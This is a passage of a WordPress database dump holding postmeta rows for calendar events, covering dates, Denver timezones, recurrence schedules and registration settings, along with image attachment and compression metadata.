_EventCurrencySymbol\";i:1607512443;s:22:\"_EventCurrencyPosition\";i:1607512443;s:10:\"_EventCost\";i:1607512443;s:9:\"_EventURL\";i:1607512443;s:14:\"_EventTimezone\";i:1607512443;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607512443;s:16:\"tribe_events_cat\";i:1607537643;}'),(151807,266081,'mec_additional_location_ids','a:0:{}'),(117206,262887,'_RTECregistrationsDisabled','1'),(117207,262887,'_RTECdeadlineType','start'),(117208,262887,'_RTECwhoCanRegister','any'),(117209,262887,'_RTEClimitRegistrations','0'),(117210,262887,'_RTECmaxRegistrations','30'),(117204,262887,'_EventOrigin','events-calendar'),(117211,262887,'boldgrid_hide_page_title','0'),(117212,262887,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:6:\"Second\";s:3:\"day\";s:1:\"7\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-10-10\";s:14:\"EventStartDate\";s:19:\"2020-12-13 12:15:00\";s:12:\"EventEndDate\";s:19:\"2020-12-13 13:45:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(117213,262887,'_EventShowMapLink','1'),(35858,225786,'_tribe_modified_fields','a:34:{s:12:\"_EventOrigin\";i:1576681193;s:13:\"_thumbnail_id\";i:1607508541;s:24:\"boldgrid_hide_page_title\";i:1576681193;s:16:\"_EventRecurrence\";i:1607509915;s:17:\"_EventShowMapLink\";i:1576681193;s:13:\"_EventShowMap\";i:1576681193;s:13:\"_EventVenueID\";i:1607508621;s:15:\"_EventStartDate\";i:1607509914;s:13:\"_EventEndDate\";i:1607509914;s:18:\"_EventStartDateUTC\";i:1607509914;s:16:\"_EventEndDateUTC\";i:1607509914;s:14:\"_EventDuration\";i:1607509915;s:20:\"_EventCurrencySymbol\";i:1576681193;s:22:\"_EventCurrencyPosition\";i:1576681193;s:10:\"_EventCost\";i:1576681193;s:9:\"_EventURL\";i:1576681193;s:14:\"_EventTimezone\";i:1576681193;s:18:\"_EventTimezoneAbbr\";i:1576681193;s:12:\"_dp_original\";i:1576681193;s:27:\"_EventNextPendingRecurrence\";i:1576681413;s:16:\"tribe_events_cat\";i:1608139398;s:10:\"_edit_last\";i:1576681261;s:10:\"post_title\";i:1607509914;s:12:\"post_content\";i:1607509914;s:11:\"post_status\";i:1576681413;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1608114200;s:16:\"protect_children\";i:1606922583;s:26:\"_RTECregistrationsDisabled\";i:1606922583;s:17:\"_RTECdeadlineType\";i:1606922583;s:19:\"_RTECwhoCanRegister\";i:1606922583;s:23:\"_RTEClimitRegistrations\";i:1606922583;s:21:\"_RTECmaxRegistrations\";i:1606922583;s:22:\"_EventHideFromUpcoming\";i:1607508489;s:12:\"_wp_old_slug\";i:1607509914;}'),(110494,225786,'_EventVenueID','262507'),(35866,225786,'_EventStartDate','2021-01-12 19:00:00'),(35867,225786,'_EventEndDate','2021-01-12 20:00:00'),(35868,225786,'_EventStartDateUTC','2021-01-13 02:00:00'),(35869,225786,'_EventEndDateUTC','2021-01-13 03:00:00'),(35870,225786,'_EventDuration','3600'),(35871,225786,'_EventCurrencySymbol',''),(35872,225786,'_EventCurrencyPosition','prefix'),(35873,225786,'_EventCost',''),(35874,225786,'_EventURL',''),(35875,225786,'_EventTimezone','America/Denver'),(35876,225786,'_EventTimezoneAbbr','MST'),(35879,225786,'_dp_original','225321'),(35878,225786,'_EventNextPendingRecurrence','2022-01-11 19:00:00'),(35880,225786,'_edit_lock','1619292400:2'),(35881,225786,'_edit_last','2'),(162547,261921,'_wp_old_date','2022-02-18'),(162549,247343,'_wp_old_date','2022-02-18'),(97458,262066,'_RTECnumRegistered','1'),(97451,262315,'original-file','2020/12/email-img-registration-600-3-updraft-pre-smush-original.jpg'),(97448,262259,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:500610;s:12:\"smushed-size\";i:490515;s:15:\"savings-percent\";d:2.020000000000000017763568394002504646778106689453125;}'),(97449,262315,'_wp_attached_file','2020/12/email-img-registration-600-3.jpg'),(97450,262315,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:600;s:6:\"height\";i:238;s:4:\"file\";s:40:\"2020/12/email-img-registration-600-3.jpg\";s:5:\"sizes\";a:3:{s:6:\"medium\";a:4:{s:4:\"file\";s:40:\"email-img-registration-600-3-300x119.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:119;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:40:\"email-img-registration-600-3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:40:\"email-img-registration-600-3-450x238.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:238;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(97446,262259,'smush-complete','1'),(97445,262259,'original-file','2020/10/welcome-ocean-1-updraft-pre-smush-original.jpg'),(104128,262441,'_EventStartDateUTC','2020-12-17 02:00:00'),(104113,262441,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1607071445;s:12:\"_EventOrigin\";i:1607071445;s:13:\"_thumbnail_id\";i:1607071861;s:24:\"boldgrid_hide_page_title\";i:1607071445;s:17:\"_EventShowMapLink\";i:1607071445;s:13:\"_EventShowMap\";i:1607071445;s:15:\"_EventStartDate\";i:1607071861;s:13:\"_EventEndDate\";i:1607071861;s:18:\"_EventStartDateUTC\";i:1607071861;s:16:\"_EventEndDateUTC\";i:1607071861;s:14:\"_EventDuration\";i:1607071861;s:20:\"_EventCurrencySymbol\";i:1607071445;s:22:\"_EventCurrencyPosition\";i:1607071445;s:10:\"_EventCost\";i:1607071445;s:9:\"_EventURL\";i:1607071445;s:14:\"_EventTimezone\";i:1607071445;s:18:\"_EventTimezoneAbbr\";i:1607071445;s:27:\"_EventNextPendingRecurrence\";i:1607071445;s:26:\"_RTECregistrationsDisabled\";i:1607071445;s:17:\"_RTECdeadlineType\";i:1607071445;s:19:\"_RTECwhoCanRegister\";i:1607071445;s:23:\"_RTEClimitRegistrations\";i:1607071445;s:21:\"_RTECmaxRegistrations\";i:1607071445;s:16:\"_EventRecurrence\";i:1607071445;s:18:\"_RTECnumRegistered\";i:1607071445;s:12:\"_dp_original\";i:1607071445;s:13:\"_EventVenueID\";i:1607071445;s:16:\"tribe_events_cat\";i:1609185788;s:10:\"_edit_last\";i:1607071468;s:12:\"post_content\";i:1607072314;s:10:\"post_title\";i:1607071652;s:11:\"post_status\";i:1607071861;}'),(104112,262441,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1607071445;s:12:\"_EventOrigin\";i:1607071445;s:13:\"_thumbnail_id\";i:1607071861;s:24:\"boldgrid_hide_page_title\";i:1607071445;s:17:\"_EventShowMapLink\";i:1607071445;s:13:\"_EventShowMap\";i:1607071445;s:15:\"_EventStartDate\";i:1607071861;s:13:\"_EventEndDate\";i:1607071861;s:18:\"_EventStartDateUTC\";i:1607071861;s:16:\"_EventEndDateUTC\";i:1607071861;s:14:\"_EventDuration\";i:1607071861;s:20:\"_EventCurrencySymbol\";i:1607071445;s:22:\"_EventCurrencyPosition\";i:1607071445;s:10:\"_EventCost\";i:1607071445;s:9:\"_EventURL\";i:1607071445;s:14:\"_EventTimezone\";i:1607071445;s:18:\"_EventTimezoneAbbr\";i:1607071445;s:27:\"_EventNextPendingRecurrence\";i:1607071445;s:26:\"_RTECregistrationsDisabled\";i:1607071445;s:17:\"_RTECdeadlineType\";i:1607071445;s:19:\"_RTECwhoCanRegister\";i:1607071445;s:23:\"_RTEClimitRegistrations\";i:1607071445;s:21:\"_RTECmaxRegistrations\";i:1607071445;s:16:\"_EventRecurrence\";i:1607071445;s:18:\"_RTECnumRegistered\";i:1607071445;s:12:\"_dp_original\";i:1607071445;s:13:\"_EventVenueID\";i:1607071445;s:16:\"tribe_events_cat\";i:1609185788;s:10:\"_edit_last\";i:1607071468;s:12:\"post_content\";i:1607072314;s:10:\"post_title\";i:1607071652;s:11:\"post_status\";i:1607071861;}'),(104127,262441,'_EventEndDate','2020-12-16 20:00:00'),(104131,262441,'_EventCurrencySymbol',''),(104132,262441,'_EventCurrencyPosition','prefix'),(104133,262441,'_EventCost',''),(104134,262441,'_EventURL',''),(104135,262441,'_EventTimezone','America/Denver'),(104136,262441,'_EventTimezoneAbbr','MST'),(104137,262441,'_EventNextPendingRecurrence','2022-02-20 22:30:00'),(104138,262441,'_RTECregistrationsDisabled','1'),(104139,262441,'_RTECdeadlineType','start'),(104140,262441,'_RTECwhoCanRegister','any'),(104141,262441,'_RTEClimitRegistrations','0'),(104142,262441,'_RTECmaxRegistrations','30'),(104143,262441,'_EventRecurrence','a:3:{s:5:\"rules\";a:0:{}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(104144,262441,'_RTECnumRegistered','0'),(104147,262441,'_dp_original','262433'),(104146,262441,'_EventVenueID','262435'),(104148,262441,'_edit_lock','1609185788:2'),(104149,262441,'_edit_last','2'),(104150,262442,'_wp_attached_file','2020/12/man-outcrop-ocean.jpg'),(104151,262442,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:470;s:6:\"height\";i:264;s:4:\"file\";s:29:\"2020/12/man-outcrop-ocean.jpg\";s:5:\"sizes\";a:3:{s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"man-outcrop-ocean-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"man-outcrop-ocean-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:29:\"man-outcrop-ocean-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(104191,262442,'original-file','2020/12/man-outcrop-ocean-updraft-pre-smush-original.jpg'),(104192,262442,'smush-complete','1'),(104193,262442,'smush-info','The file was compressed from 21.57 KB to 20.75 KB saving 3.78 percent using WP-Optimize'),(104194,262442,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:22085;s:12:\"smushed-size\";i:21250;s:15:\"savings-percent\";d:3.779999999999999804600747665972448885440826416015625;}'),(104195,262424,'original-file','2020/12/kayak-to-other-worlds-updraft-pre-smush-original.jpg'),(104196,262424,'smush-complete','1'),(104197,262424,'smush-info','The file was compressed from 41.90 KB to 39.68 KB saving 5.3 percent using WP-Optimize'),(104198,262424,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:42905;s:12:\"smushed-size\";i:40631;s:15:\"savings-percent\";d:5.29999999999999982236431605997495353221893310546875;}'),(118826,262954,'_EventStartDate','2021-02-14 09:00:00'),(117433,262895,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:6:\"Second\";s:3:\"day\";s:1:\"4\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-10-14\";s:14:\"EventStartDate\";s:19:\"2020-12-10 19:00:00\";s:12:\"EventEndDate\";s:19:\"2020-12-10 20:30:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(117423,262895,'protect_children',''),(117418,262895,'_EventStartDateUTC','2021-01-15 02:00:00'),(117430,262895,'_RTEClimitRegistrations','0'),(117431,262895,'_RTECmaxRegistrations','30'),(117417,262895,'_EventStartDate','2021-01-14 19:00:00'),(117713,262905,'protect_children',''),(117714,262905,'_tribe_modified_fields','a:30:{s:16:\"protect_children\";i:1607512687;s:12:\"_EventOrigin\";i:1607512687;s:10:\"_edit_last\";i:1607512708;s:10:\"post_title\";i:1607512708;s:12:\"post_content\";i:1607512809;s:11:\"post_status\";i:1607512809;s:16:\"tribe_events_cat\";i:1607538009;s:13:\"_thumbnail_id\";i:1607512809;s:26:\"_RTECregistrationsDisabled\";i:1607512809;s:17:\"_RTECdeadlineType\";i:1607512809;s:19:\"_RTECwhoCanRegister\";i:1607512809;s:23:\"_RTEClimitRegistrations\";i:1607512809;s:21:\"_RTECmaxRegistrations\";i:1607512809;s:24:\"boldgrid_hide_page_title\";i:1607512809;s:16:\"_EventRecurrence\";i:1607545641;s:17:\"_EventShowMapLink\";i:1607512809;s:13:\"_EventShowMap\";i:1607512809;s:13:\"_EventVenueID\";i:1607512809;s:15:\"_EventStartDate\";i:1607512809;s:13:\"_EventEndDate\";i:1607512809;s:18:\"_EventStartDateUTC\";i:1607512809;s:16:\"_EventEndDateUTC\";i:1607512809;s:14:\"_EventDuration\";i:1607512809;s:20:\"_EventCurrencySymbol\";i:1607512809;s:22:\"_EventCurrencyPosition\";i:1607512809;s:10:\"_EventCost\";i:1607512809;s:9:\"_EventURL\";i:1607512809;s:14:\"_EventTimezone\";i:1607512809;s:18:\"_EventTimezoneAbbr\";i:1607512809;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607545642;}'),(117715,262905,'_EventOrigin','events-calendar'),(117441,262895,'_EventTimezone','America/Denver'),(117716,262905,'_edit_lock','1619291991:2'),(117425,262895,'_EventOrigin','events-calendar'),(117717,262905,'_edit_last','2'),(151802,266081,'mec_more_info_title',''),(104261,259038,'_edit_last','2'),(104262,259038,'_RTECregistrationsDisabled','1'),(104263,259038,'_RTECdeadlineType','start'),(104264,259038,'_RTECwhoCanRegister','any'),(104265,259038,'_RTEClimitRegistrations','0'),(104266,259038,'_RTECmaxRegistrations','30'),(119168,262965,'_EventCost',''),(119149,262965,'_EventEndDateUTC','2021-03-21 16:15:00'),(119153,262965,'_tribe_modified_fields','a:20:{s:12:\"_EventOrigin\";i:1607545641;s:16:\"protect_children\";i:1607545641;s:13:\"_thumbnail_id\";i:1607545641;s:26:\"_RTECregistrationsDisabled\";i:1607545641;s:17:\"_RTECdeadlineType\";i:1607545641;s:19:\"_RTECwhoCanRegister\";i:1607545641;s:23:\"_RTEClimitRegistrations\";i:1607545641;s:21:\"_RTECmaxRegistrations\";i:1607545641;s:24:\"boldgrid_hide_page_title\";i:1607545641;s:16:\"_EventRecurrence\";i:1607545641;s:17:\"_EventShowMapLink\";i:1607545641;s:13:\"_EventShowMap\";i:1607545641;s:13:\"_EventVenueID\";i:1607545641;s:20:\"_EventCurrencySymbol\";i:1607545641;s:22:\"_EventCurrencyPosition\";i:1607545641;s:10:\"_EventCost\";i:1607545641;s:9:\"_EventURL\";i:1607545641;s:14:\"_EventTimezone\";i:1607545641;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607545641;s:16:\"tribe_events_cat\";i:1607570841;}'),(119150,262965,'_EventDuration','4500'),(119151,262965,'_tribe_modified_fields','a:20:{s:12:\"_EventOrigin\";i:1607545641;s:16:\"protect_children\";i:1607545641;s:13:\"_thumbnail_id\";i:1607545641;s:26:\"_RTECregistrationsDisabled\";i:1607545641;s:17:\"_RTECdeadlineType\";i:1607545641;s:19:\"_RTECwhoCanRegister\";i:1607545641;s:23:\"_RTEClimitRegistrations\";i:1607545641;s:21:\"_RTECmaxRegistrations\";i:1607545641;s:24:\"boldgrid_hide_page_title\";i:1607545641;s:16:\"_EventRecurrence\";i:1607545641;s:17:\"_EventShowMapLink\";i:1607545641;s:13:\"_EventShowMap\";i:1607545641;s:13:\"_EventVenueID\";i:1607545641;s:20:\"_EventCurrencySymbol\";i:1607545641;s:22:\"_EventCurrencyPosition\";i:1607545641;s:10:\"_EventCost\";i:1607545641;s:9:\"_EventURL\";i:1607545641;s:14:\"_EventTimezone\";i:1607545641;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607545641;s:16:\"tribe_events_cat\";i:1607570841;}'),(119148,262965,'_EventEndDate','2021-03-21 10:15:00'),(119152,262965,'protect_children',''),(119146,262965,'_EventStartDate','2021-03-21 09:00:00'),(119147,262965,'_EventStartDateUTC','2021-03-21 15:00:00'),(119161,262965,'boldgrid_hide_page_title','0'),(104289,257613,'_RTECdeadlineType','start'),(104290,257613,'_RTECwhoCanRegister','any'),(104291,257613,'_RTEClimitRegistrations','0'),(104292,257613,'_RTECmaxRegistrations','30'),(104293,257613,'_EventHideFromUpcoming','yes'),(104296,257577,'_RTECregistrationsDisabled','1'),(104297,257577,'_RTECdeadlineType','start'),(104298,257577,'_RTECwhoCanRegister','any'),(104299,257577,'_RTEClimitRegistrations','0'),(104300,257577,'_RTECmaxRegistrations','30'),(104301,257577,'_EventHideFromUpcoming','yes'),(120279,263018,'_thumbnail_id','263189'),(119720,262989,'_EventOrigin','events-calendar'),(119991,263006,'_edit_last','2'),(121022,263189,'smush-complete','1'),(121023,263189,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:54665;s:12:\"smushed-size\";i:51169;s:15:\"savings-percent\";d:6.4000000000000003552713678800500929355621337890625;}'),(121021,263189,'smush-info','The file was compressed from 53.38 KB to 49.97 KB saving 6.4 percent using WP-Optimize'),(121020,263189,'original-file','2020/12/machu-pichu-1-updraft-pre-smush-original.jpg'),(104321,242058,'_RTECdeadlineType','start'),(104322,242058,'_RTECwhoCanRegister','any'),(104323,242058,'_RTEClimitRegistrations','0'),(104324,242058,'_RTECmaxRegistrations','30'),(119362,262972,'_RTEClimitRegistrations','0'),(119342,262971,'_EventCost',''),(119343,262971,'_EventURL',''),(119344,262971,'_EventTimezone','America/Denver'),(119345,262971,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:10:{i:0;a:2:{s:9:\"timestamp\";i:1610874000;s:8:\"duration\";i:4500;}i:1;a:2:{s:9:\"timestamp\";i:1613898000;s:8:\"duration\";i:4500;}i:2;a:2:{s:9:\"timestamp\";i:1616317200;s:8:\"duration\";i:4500;}i:3;a:2:{s:9:\"timestamp\";i:1618736400;s:8:\"duration\";i:4500;}i:4;a:2:{s:9:\"timestamp\";i:1621155600;s:8:\"duration\";i:4500;}i:5;a:2:{s:9:\"timestamp\";i:1624179600;s:8:\"duration\";i:4500;}i:6;a:2:{s:9:\"timestamp\";i:1626598800;s:8:\"duration\";i:4500;}i:7;a:2:{s:9:\"timestamp\";i:1629018000;s:8:\"duration\";i:4500;}i:8;a:2:{s:9:\"timestamp\";i:1632042000;s:8:\"duration\";i:4500;}i:9;a:2:{s:9:\"timestamp\";i:1634461200;s:8:\"duration\";i:4500;}}s:6:\"update\";a:0:{}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:10;}'),(125329,263323,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:0:{}s:6:\"update\";a:12:{i:263323;a:2:{s:9:\"timestamp\";i:1607972400;s:8:\"duration\";i:5400;}i:263324;a:2:{s:9:\"timestamp\";i:1610391600;s:8:\"duration\";i:5400;}i:263325;a:2:{s:9:\"timestamp\";i:1612810800;s:8:\"duration\";i:5400;}i:263326;a:2:{s:9:\"timestamp\";i:1615230000;s:8:\"duration\";i:5400;}i:263327;a:2:{s:9:\"timestamp\";i:1618254000;s:8:\"duration\";i:5400;}i:263328;a:2:{s:9:\"timestamp\";i:1620673200;s:8:\"duration\";i:5400;}i:263329;a:2:{s:9:\"timestamp\";i:1623697200;s:8:\"duration\";i:5400;}i:263330;a:2:{s:9:\"timestamp\";i:1626116400;s:8:\"duration\";i:5400;}i:263331;a:2:{s:9:\"timestamp\";i:1628535600;s:8:\"duration\";i:5400;}i:263332;a:2:{s:9:\"timestamp\";i:1631559600;s:8:\"duration\";i:5400;}i:263333;a:2:{s:9:\"timestamp\";i:1633978800;s:8:\"duration\";i:5400;}i:263334;a:2:{s:9:\"timestamp\";i:1636398000;s:8:\"duration\";i:5400;}}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:12;}'),(124643,263324,'_EventStartDate','2021-01-11 19:00:00'),(124644,263324,'_EventStartDateUTC','2021-01-12 02:00:00'),(124645,263324,'_EventEndDate','2021-01-11 20:30:00'),(124646,263324,'_EventEndDateUTC','2021-01-12 03:30:00'),(124647,263324,'_EventDuration','5400'),(125336,263324,'_EventOrigin','events-calendar'),(125338,263324,'_RTECregistrationsDisabled','1'),(125339,263324,'_RTECdeadlineType','start'),(125334,263324,'_tribe_modified_fields','a:21:{s:16:\"protect_children\";i:1610630420;s:12:\"_EventOrigin\";i:1610630420;s:13:\"_thumbnail_id\";i:1610630420;s:26:\"_RTECregistrationsDisabled\";i:1610630420;s:17:\"_RTECdeadlineType\";i:1610630420;s:19:\"_RTECwhoCanRegister\";i:1610630420;s:23:\"_RTEClimitRegistrations\";i:1610630420;s:21:\"_RTECmaxRegistrations\";i:1610630420;s:24:\"boldgrid_hide_page_title\";i:1610630420;s:16:\"_EventRecurrence\";i:1610630420;s:17:\"_EventShowMapLink\";i:1610630420;s:13:\"_EventShowMap\";i:1610630420;s:13:\"_EventVenueID\";i:1610630420;s:20:\"_EventCurrencySymbol\";i:1610630420;s:22:\"_EventCurrencyPosition\";i:1610630420;s:10:\"_EventCost\";i:1610630420;s:9:\"_EventURL\";i:1610630420;s:14:\"_EventTimezone\";i:1610630420;s:12:\"_dp_original\";i:1610630420;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610630420;s:16:\"tribe_events_cat\";i:1610655620;}'),(125331,263324,'protect_children',''),(125332,263324,'protect_children',''),(125333,263324,'_tribe_modified_fields','a:21:{s:16:\"protect_children\";i:1610630420;s:12:\"_EventOrigin\";i:1610630420;s:13:\"_thumbnail_id\";i:1610630420;s:26:\"_RTECregistrationsDisabled\";i:1610630420;s:17:\"_RTECdeadlineType\";i:1610630420;s:19:\"_RTECwhoCanRegister\";i:1610630420;s:23:\"_RTEClimitRegistrations\";i:1610630420;s:21:\"_RTECmaxRegistrations\";i:1610630420;s:24:\"boldgrid_hide_page_title\";i:1610630420;s:16:\"_EventRecurrence\";i:1610630420;s:17:\"_EventShowMapLink\";i:1610630420;s:13:\"_EventShowMap\";i:1610630420;s:13:\"_EventVenueID\";i:1610630420;s:20:\"_EventCurrencySymbol\";i:1610630420;s:22:\"_EventCurrencyPosition\";i:1610630420;s:10:\"_EventCost\";i:1610630420;s:9:\"_EventURL\";i:1610630420;s:14:\"_EventTimezone\";i:1610630420;s:12:\"_dp_original\";i:1610630420;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610630420;s:16:\"tribe_events_cat\";i:1610655620;}'),(125353,263324,'_dp_original','263319'),(119287,262969,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:10:{i:0;a:2:{s:9:\"timestamp\";i:1610874000;s:8:\"duration\";i:4500;}i:1;a:2:{s:9:\"timestamp\";i:1613898000;s:8:\"duration\";i:4500;}i:2;a:2:{s:9:\"timestamp\";i:1616317200;s:8:\"duration\";i:4500;}i:3;a:2:{s:9:\"timestamp\";i:1618736400;s:8:\"duration\";i:4500;}i:4;a:2:{s:9:\"timestamp\";i:1621155600;s:8:\"duration\";i:4500;}i:5;a:2:{s:9:\"timestamp\";i:1624179600;s:8:\"duration\";i:4500;}i:6;a:2:{s:9:\"timestamp\";i:1626598800;s:8:\"duration\";i:4500;}i:7;a:2:{s:9:\"timestamp\";i:1629018000;s:8:\"duration\";i:4500;}i:8;a:2:{s:9:\"timestamp\";i:1632042000;s:8:\"duration\";i:4500;}i:9;a:2:{s:9:\"timestamp\";i:1634461200;s:8:\"duration\";i:4500;}}s:6:\"update\";a:0:{}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:10;}'),(118948,262958,'protect_children',''),(118949,262958,'_tribe_modified_fields','a:20:{s:12:\"_EventOrigin\";i:1607545354;s:16:\"protect_children\";i:1607545354;s:13:\"_thumbnail_id\";i:1607545354;s:26:\"_RTECregistrationsDisabled\";i:1607545354;s:17:\"_RTECdeadlineType\";i:1607545354;s:19:\"_RTECwhoCanRegister\";i:1607545354;s:23:\"_RTEClimitRegistrations\";i:1607545354;s:21:\"_RTECmaxRegistrations\";i:1607545354;s:24:\"boldgrid_hide_page_title\";i:1607545354;s:16:\"_EventRecurrence\";i:1607545354;s:17:\"_EventShowMapLink\";i:1607545354;s:13:\"_EventShowMap\";i:1607545354;s:13:\"_EventVenueID\";i:1607545354;s:20:\"_EventCurrencySymbol\";i:1607545354;s:22:\"_EventCurrencyPosition\";i:1607545354;s:10:\"_EventCost\";i:1607545354;s:9:\"_EventURL\";i:1607545354;s:14:\"_EventTimezone\";i:1607545354;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607545354;s:16:\"tribe_events_cat\";i:1607570554;}'),(118938,262957,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:10:{i:0;a:2:{s:9:\"timestamp\";i:1610269200;s:8:\"duration\";i:4500;}i:1;a:2:{s:9:\"timestamp\";i:1613293200;s:8:\"duration\";i:4500;}i:2;a:2:{s:9:\"timestamp\";i:1615712400;s:8:\"duration\";i:4500;}i:3;a:2:{s:9:\"timestamp\";i:1618131600;s:8:\"duration\";i:4500;}i:4;a:2:{s:9:\"timestamp\";i:1620550800;s:8:\"duration\";i:4500;}i:5;a:2:{s:9:\"timestamp\";i:1623574800;s:8:\"duration\";i:4500;}i:6;a:2:{s:9:\"timestamp\";i:1625994000;s:8:\"duration\";i:4500;}i:7;a:2:{s:9:\"timestamp\";i:1628413200;s:8:\"duration\";i:4500;}i:8;a:2:{s:9:\"timestamp\";i:1631437200;s:8:\"duration\";i:4500;}i:9;a:2:{s:9:\"timestamp\";i:1633856400;s:8:\"duration\";i:4500;}}s:6:\"update\";a:0:{}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:10;}'),(118937,262957,'_EventTimezone','America/Denver'),(118798,262953,'_EventStartDateUTC','2021-01-10 16:00:00'),(118029,262917,'_EventStartDate','2021-09-05 09:00:00'),(118030,262917,'_EventStartDateUTC','2021-09-05 15:00:00'),(118031,262917,'_EventEndDate','2021-09-05 10:15:00'),(118935,262957,'_EventCost',''),(118032,262917,'_EventEndDateUTC','2021-09-05 16:15:00'),(118033,262917,'_EventDuration','4500'),(118814,262953,'_EventShowMapLink','1'),(118800,262953,'_EventEndDateUTC','2021-01-10 17:15:00'),(118801,262953,'_EventDuration','4500'),(118802,262953,'_tribe_modified_fields','a:20:{s:12:\"_EventOrigin\";i:1607545353;s:16:\"protect_children\";i:1607545353;s:13:\"_thumbnail_id\";i:1607545353;s:26:\"_RTECregistrationsDisabled\";i:1607545353;s:17:\"_RTECdeadlineType\";i:1607545353;s:19:\"_RTECwhoCanRegister\";i:1607545353;s:23:\"_RTEClimitRegistrations\";i:1607545353;s:21:\"_RTECmaxRegistrations\";i:1607545353;s:24:\"boldgrid_hide_page_title\";i:1607545353;s:16:\"_EventRecurrence\";i:1607545353;s:17:\"_EventShowMapLink\";i:1607545353;s:13:\"_EventShowMap\";i:1607545353;s:13:\"_EventVenueID\";i:1607545353;s:20:\"_EventCurrencySymbol\";i:1607545353;s:22:\"_EventCurrencyPosition\";i:1607545353;s:10:\"_EventCost\";i:1607545353;s:9:\"_EventURL\";i:1607545353;s:14:\"_EventTimezone\";i:1607545353;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1607545353;s:16:\"tribe_events_cat\";i:1607570553;}'),(118753,262917,'_tribe_modified_fields','a:19:{s:16:\"protect_children\";i:1607513876;s:12:\"_EventOrigin\";i:1607513876;s:26:\"_RTECregistrationsDisabled\";i:1607513876;s:17:\"_RTECdeadlineType\";i:1607513876;s:19:\"_RTECwhoCanRegister\";i:1607513876;s:23:\"_RTEClimitRegistrations\";i:1607513876;s:21:\"_RTECmaxRegistrations\";i:1607513876;s:24:\"boldgrid_hide_page_title\";i:1607513876;s:16:\"_EventRecurrence\";i:1607513876;s:17:\"_EventShowMapLink\";i:1607513876;s:13:\"_EventShowMap\";i:1607513876;s:13:\"_EventVenueID\";i:1607513876;s:20:\"_E